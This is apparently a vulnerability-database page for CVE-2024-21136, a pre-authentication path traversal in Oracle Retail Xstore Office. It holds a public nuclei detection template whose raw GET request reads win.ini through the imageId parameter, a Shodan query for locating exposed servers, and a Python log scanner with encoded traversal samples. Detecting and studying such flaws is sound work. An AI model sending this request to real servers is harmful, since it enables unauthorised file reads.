CVE-2024-21136: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal

Date: 2025-08-01 | Affected software: Oracle Retail Xstore Suite | PoC: public

Vulnerability description

Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).

PoC code [public]

id: CVE-2024-21136

info:
  name: Oracle Retail Xstore Suite - Pre-authenticated Path Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Vulnerability in the Oracle Retail Xstore Office product of Oracle Retail Applications (component: Security). Supported versions that are affected are 19.0.5, 20.0.3, 20.0.4, 22.0.0 and 23.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Retail Xstore Office. While the vulnerability is in Oracle Retail Xstore Office, attacks may significantly impact additional products (scope change).
  impact: |
    Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Retail Xstore Office accessible data.
  reference:
    - https://www.oracle.com/security-alerts/cpuapr2024.html
    - https://www.synacktiv.com/en/advisories/oracle-retail-xstore-suite-pre-authenticated-path-traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21136
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-21136
    epss-score: 0.38978
    epss-percentile: 0.97179
    cpe: cpe:2.3:a:oracle:retail_xstore_office:19.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: retail_xstore_office
    shodan-query: html:"xstoremgwt"
  tags: cve,cve2024,oracle,xstore,lfi,vkev

http:
  - raw:
      - |
        GET /xstoremgwt/cheetahImages?imageId=..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'for 16-bit app support'
          - '[fonts]'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009037fb6b5e6b0fd4d7b83836ac59aa8fd39881eea312618e161f8faf092a4597022100da22dfcb9212fefb9953f2a0ca03fff82b015ffe8a80017e9a044d250dfa4c62:922c64590222798bb761d5b6d8e72950
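As an added example (not part of the nuclei template above or of Oracle's product), the following Python helper scans web-server access-log lines for traversal attempts against the endpoint the template probes, undoing nested percent-encoding and treating backslashes as path separators since the affected deployment serves Windows paths. The log format, the regular expression and every sample entry are assumptions constructed for this note.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Endpoint and parameter from the nuclei template above.
AFFECTED_PATH = "/xstoremgwt/cheetahImages"
# Assumed common-log-format line: ip - - [ts] "METHOD /path?query HTTP/1.1" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so double-encoded
    sequences such as %252e%252e are seen as '..' by the check below."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(image_id: str) -> bool:
    """True if imageId contains a '..' segment after decoding; backslashes
    count as separators because the template's payload uses them."""
    normalized = decode_repeatedly(image_id).replace("\\", "/")
    return any(seg == ".." for seg in normalized.split("/"))

def scan_log(lines):
    """Return (client ip, status, decoded imageId) for every request to the
    affected endpoint whose imageId escapes the image directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != AFFECTED_PATH:
            continue
        for image_id in parse_qs(parts.query).get("imageId", []):
            if is_traversal(image_id):
                hits.append((m.group("ip"), int(m.group("status")), image_id))
    return hits

# Constructed sample log lines (not real traffic); the third is double-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /xstoremgwt/cheetahImages?imageId=logo.png HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /xstoremgwt/cheetahImages?imageId=..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 403',
    '198.51.100.9 - - [01/Aug/2025:10:00:03 +0000] "GET /xstoremgwt/cheetahImages?imageId=%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 0',
    '198.51.100.9 - - [01/Aug/2025:10:00:04 +0000] "GET /xstoremgwt/other?imageId=../x HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, status, image_id in scan_log(SAMPLE_LOG):
        print(f"traversal attempt from {ip} (status {status}): imageId={image_id}")
```

A status of 200 on a flagged request is the strongest signal, since the template's matcher also requires a 200 with win.ini content in the body; 404s still show probing worth correlating by source address.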
